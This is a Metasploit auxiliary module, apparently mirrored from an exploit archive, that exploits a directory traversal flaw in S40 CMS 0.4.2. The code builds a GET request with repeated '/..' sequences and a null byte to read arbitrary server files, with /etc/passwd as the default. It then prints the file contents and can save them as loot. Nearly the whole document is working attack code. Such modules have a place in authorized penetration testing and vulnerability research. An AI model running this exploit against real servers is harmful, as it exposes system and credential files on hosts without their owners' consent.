## https://sploitus.com/exploit?id=PACKETSTORM:181018
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'S40 0.4.2 CMS Directory Traversal Vulnerability',
'Description' => %q{
This module exploits a directory traversal vulnerability found in S40 CMS.
The flaw is due to the 'page' function not properly handling the $pid parameter,
which allows a malicious user to load an arbitrary file path.
},
'References' =>
[
[ 'OSVDB', '82469'],
[ 'EDB', '17129' ]
],
'Author' =>
[
'Osirys <osirys[at]autistici.org>', #Discovery, PoC
'sinn3r'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2011-04-07'
))
register_options(
[
Opt::RPORT(80),
OptString.new("TARGETURI", [true, 'The base path to S40', '/s40/']),
OptString.new("FILE", [true, 'The file to retrieve', '/etc/passwd']),
OptBool.new('SAVE', [false, 'Save the HTTP body', false]),
OptInt.new("DEPTH", [true, 'Traversal depth', 10])
])
end
def run_host(ip)
uri = target_uri.path
uri << '/' if uri[-1, 1] != '/'
t = "/.." * datastore['DEPTH']
vprint_status("Retrieving #{datastore['FILE']}")
# No permission to access.log or proc/self/environ, so this is all we do :-/
uri = normalize_uri(uri, 'index.php')
res = send_request_raw({
'method' => 'GET',
'uri' => "#{uri}/?p=#{t}#{datastore['FILE']}%00"
})
if not res
vprint_error("Server timed out")
elsif res and res.body =~ /Error 404 requested page cannot be found/
vprint_error("Either the file doesn't exist, or you don't have the permission to get it")
else
# We don't save the body by default, because there's also other junk in it.
# But we still have a SAVE option just in case
print_good("#{datastore['FILE']} retrieved")
vprint_line(res.body)
if datastore['SAVE']
p = store_loot(
's40.file',
'application/octet-stream',
rhost,
res.body,
::File.basename(datastore['FILE'])
)
print_good("File saved as: #{p}")
end
end
end
end